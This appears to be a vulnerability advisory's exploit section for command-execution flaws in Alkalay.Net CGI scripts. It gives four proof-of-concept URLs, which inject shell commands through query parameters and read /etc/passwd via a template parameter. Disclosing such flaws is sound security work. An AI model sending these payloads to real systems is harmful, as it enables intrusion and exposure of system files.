• info
• discussion
• exploit
• solution
• references

Alkalay.Net Multiple Scripts Arbitrary Remote Command Execution Vulnerabilities

No exploit is required.

The following proof of concept URI are available:
http://www.example.com/cgi-bin/man-cgi?section=0&topic=ls;touch%20/tmp/test
http://www.example.com/cgi-bin/nslookup.cgi?query=example.com%3B/bin/cat%20/etc/passwd&type=ANY&ns=
http://www.example.com/cgi-bin/contribute.pl?template=/etc/passwd&contribdir=.
http://www.example.com/cgi-bin/contribute.cgi?template=/etc/passwd&contribdir=.